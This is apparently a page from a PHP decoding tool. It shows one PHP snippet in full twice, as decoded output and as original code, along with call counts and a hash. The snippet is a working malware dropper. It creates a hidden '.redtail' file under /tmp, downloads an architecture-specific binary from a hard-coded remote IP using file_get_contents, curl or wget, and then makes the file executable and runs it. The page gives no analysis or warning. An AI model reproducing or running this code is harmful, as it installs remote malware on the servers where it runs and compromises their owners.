Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
function b(){$s=shell_exec("uname -m 2>&1");if(strpos($s,"i386")!==false||strpos($s,"i686"..
Decoded Output download
<? function b(){$s=shell_exec("uname -m 2>&1");if(strpos($s,"i386")!==false||strpos($s,"i686")!==false){return "i686";}if(strpos($s,"aarch64")!==false||strpos($s,"arm8")!==false){return "arm8";}if(strpos($s,"arm7")!==false){return "arm7";}return "x86_64";}$a=b();$u=get_current_user();$p="/tmp/$u";if(!file_exists($p)){mkdir($p,0744,true);}$p="/tmp/$u/.redtail";if(file_exists($p)){shell_exec("rm -rf $p");}$f=fopen($p,"wb");if(filter_var(ini_get("allow_url_fopen"),FILTER_VALIDATE_BOOLEAN)){$b=file_get_contents("http://45.95.147.236/download/redtail.$a");fwrite($f,$b,strlen($b));}else{if(function_exists("curl_init")){$h=curl_init("http://45.95.147.236/download/redtail.$a");curl_setopt($h,CURLOPT_FILE,$f);curl_exec($h);curl_close($h);}else{fclose($f);shell_exec("cd /tmp/$u; wget http://45.95.147.236/download/redtail.$a -O .redtail; chmod +x .redtail; ./.redtail");exit();}}fclose($f);shell_exec("cd /tmp/$u; chmod +x .redtail; ./.redtail");exit(); ?>
Did this file decode correctly?
Original Code
function b(){$s=shell_exec("uname -m 2>&1");if(strpos($s,"i386")!==false||strpos($s,"i686")!==false){return "i686";}if(strpos($s,"aarch64")!==false||strpos($s,"arm8")!==false){return "arm8";}if(strpos($s,"arm7")!==false){return "arm7";}return "x86_64";}$a=b();$u=get_current_user();$p="/tmp/$u";if(!file_exists($p)){mkdir($p,0744,true);}$p="/tmp/$u/.redtail";if(file_exists($p)){shell_exec("rm -rf $p");}$f=fopen($p,"wb");if(filter_var(ini_get("allow_url_fopen"),FILTER_VALIDATE_BOOLEAN)){$b=file_get_contents("http://45.95.147.236/download/redtail.$a");fwrite($f,$b,strlen($b));}else{if(function_exists("curl_init")){$h=curl_init("http://45.95.147.236/download/redtail.$a");curl_setopt($h,CURLOPT_FILE,$f);curl_exec($h);curl_close($h);}else{fclose($f);shell_exec("cd /tmp/$u; wget http://45.95.147.236/download/redtail.$a -O .redtail; chmod +x .redtail; ./.redtail");exit();}}fclose($f);shell_exec("cd /tmp/$u; chmod +x .redtail; ./.redtail");exit();
Function Calls
b | 1 |
shell_exec | 1 |
Stats
MD5 | a678e77319c0a71ab742e5b604ecf159 |
Eval Count | 0 |
Decode Time | 61 ms |